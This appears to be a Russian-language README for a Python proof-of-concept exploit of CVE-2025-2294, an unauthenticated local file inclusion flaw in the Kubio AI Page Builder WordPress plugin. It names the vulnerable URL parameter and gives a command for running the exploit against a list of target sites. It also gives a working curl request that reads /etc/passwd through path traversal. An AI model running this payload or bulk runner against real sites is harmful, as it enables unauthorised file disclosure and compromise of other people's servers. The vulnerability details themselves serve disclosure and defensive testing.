
Python PoC для CVE-2025-2294 — неаутентифицированное локальное включение файлов в плагине Kubio AI Page Builder для WordPress (≤2.5.1), демонстрирующее произвольное раскрытие файлов и потенциальное удалённое выполнение кода.
CVE-2025-2294 — это критическая 🔥 уязвимость локального включения файлов (LFI), затрагивающая плагин Kubio AI Page Builder для WordPress (версии до 2.5.1 включительно). Эта ошибка позволяет неаутентифицированным удаленным злоумышленникам 👾 включать произвольные файлы на сервере через параметр URL __kubio-site-edit-iframe-classic-template.
Эксплуатация этой уязвимости может привести к раскрытию конфиденциальных файлов 📂, удаленному выполнению кода 💥 и полной компрометации системы 💀.
Muhammad Nizar — Исследователь безопасности 🔐
GitHub: 0xWhoami35
YouTube: InfoSec Insight ▶️
Не стесняйтесь обращаться с вопросами или для сотрудничества! 🤝
Запустите скрипт эксплойта со списком целевых URL:
python3 lfi.py -l list.txt
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"